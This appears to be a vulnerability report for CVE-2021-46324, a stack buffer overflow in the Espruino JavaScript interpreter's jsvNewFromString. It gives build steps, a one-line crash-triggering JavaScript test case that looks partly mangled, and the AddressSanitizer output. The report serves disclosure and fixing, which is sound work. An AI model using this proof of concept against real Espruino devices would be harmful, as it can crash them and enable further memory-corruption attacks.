Headline
CVE-2021-46324: Stack-buffer-overflow src/jsvar.c:910 in jsvNewFromString · Issue #2121 · espruino/Espruino
Espruino 2v11.251 was discovered to contain a stack buffer overflow via src/jsvar.c in jsvNewFromString.
Espruino revision
Commit: 53108085
Version: 2v11.251
Build environment
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
export CCFLAGS=’-g -fsanitize=address -fno-omit-frame-pointer’ make clean && make
Test case
var result = (new Array(64)."a", "b",expected,actual(new Array(64))).concat([“H”]); var value = result[0]; if (value !== void 0) throw “Error” + value;
Execution & Output
./Espruino/espruino poc.js
================================================================= =========ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffef778ec61 at pc 0x55e21c41efe8 bp 0x7ffef778eb70 sp 0x7ffef778eb60 READ of size 1 at 0x7ffef778ec61 thread T0 #0 0x55e21c41efe7 in jsvNewFromString src/jsvar.c:910 #1 0x55e21c456e0c in jsvAddNamedChild src/jsvar.c:2581 #2 0x55e21c52d165 in jspeAddNamedFunctionParameter src/jsparse.c:1442 #3 0x55e21c5540ee in jspeExpressionOrArrowFunction src/jsparse.c:1469 #4 0x55e21c555c06 in jspeFactor src/jsparse.c:1622 #5 0x55e21c53891f in jspeFactorFunctionCall src/jsparse.c:1160 #6 0x55e21c539f38 in jspePostfixExpression src/jsparse.c:1786 #7 0x55e21c541192 in jspeBinaryExpression src/jsparse.c:1955 #8 0x55e21c541192 in jspeConditionalExpression src/jsparse.c:1991 #9 0x55e21c541192 in jspeAssignmentExpression src/jsparse.c:2050 #10 0x55e21c541192 in jspeStatementVar src/jsparse.c:2165 #11 0x55e21c54b6d4 in jspeBlockOrStatement src/jsparse.c:2124 #12 0x55e21c54da1e in jspParse src/jsparse.c:2136 #13 0x55e21c55c3ea in jspEvaluateVar src/jsparse.c:2996 #14 0x55e21c55c3ea in jspEvaluate src/jsparse.c:3026 #15 0x55e21c36c025 in main targets/linux/main.c:460 #16 0x7fa0f5814bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #17 0x55e21c36fbc9 in _start (/root/Espruino/espruino+0x4ebc9) Address 0x7ffef778ec61 is located in stack of thread T0 at offset 97 in frame #0 0x55e21c52cedf in jspeAddNamedFunctionParameter src/jsparse.c:1437 This frame has 1 object(s): [32, 97) ‘buf’ <== Memory access at offset 97 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow src/jsvar.c:910 in jsvNewFromString Shadow bytes around the buggy address: 0x10005eee9d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10005eee9d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10005eee9d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10005eee9d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10005eee9d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10005eee9d80: f1 f1 f1 f1 00 00 00 00 00 00 00 00[01]f2 f2 f2 0x10005eee9d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10005eee9da0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 0x10005eee9db0: 00 00 00 00 00 00 00 f2 00 00 00 00 00 00 00 00 0x10005eee9dc0: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 0x10005eee9dd0: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb =========ABORTING